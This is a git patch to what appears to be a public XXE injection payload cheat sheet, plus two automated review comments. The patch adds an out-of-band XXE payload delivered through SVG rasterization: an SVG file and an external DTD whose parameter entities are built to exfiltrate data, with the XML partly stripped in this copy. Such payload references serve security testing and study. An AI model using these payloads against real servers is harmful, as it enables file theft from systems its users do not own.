From 83f46a22e3d845ddc8d1b106d3236bbc374e2561 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sat, 2 Nov 2019 00:54:48 +0100 Subject: [PATCH] add XXE via SVG rasterization --- XXE Injection/README.md | 37 ++++++++++++++++++++++++++++++++++++- 1 file changed, 36 insertions(+), 1 deletion(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index d4792dd..ba1bb59 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -364,7 +364,9 @@ Assuming payloads such as the previous return a verbose error. You can start poi ``` -``` +**Classic** + +```xml ]> @@ -372,6 +374,38 @@ Assuming payloads such as the previous return a verbose error. You can start poi ``` +**OOB via SVG rasterization** + +*xxe.svg* + +```xml + + +%sp; +%param1; +]> + + XXE via SVG rasterization + + + + + + + &exfil; + + + +``` + +*xxe.xml* + +```xml + +"> +``` + ### XXE inside SOAP ```xml @@ -479,3 +513,4 @@ updating: xl/sharedStrings.xml (deflated 17%) * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) - [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) +- [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube)
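Review bot: Missing documentation in the `@@ -372,6 +374,38 @@` hunk: the `**OOB via SVG rasterization**` label is followed directly by the `*xxe.svg*` and `*xxe.xml*` blocks, with no sentence stating the role of each file or the server behaviour the case depends on. A short line under the label would make the entry self-contained: that it applies when an application rasterizes user-supplied SVG with an XML parser that resolves external entities, and what `%sp;`, `%param1;` and `&exfil;` each refer to. At present the only explanation is the write-up linked in the references hunk. A closing note that disabling DTD and external-entity processing in the rasterizer's parser removes the condition would also help readers using the page for remediation.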
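Review bot: Style point on the added reference in the `@@ -479,3 +513,4 @@` hunk: `- [Midnight Sun CTF 2019 Quals - Rubenscube](...)` carries no date or author inside the link text, while the neighbouring entries do ("July 16 2019 by Philippe Arteau", "NOV 12 2018 - MARC WICKENDEN", "2019 PortSwigger Ltd"). Suggest adding the publication date and the team or author name in the same position so the list stays uniform. The context lines also mix `*` and `-` bullets; the new line matches its immediate neighbours, so nothing to change there in this patch.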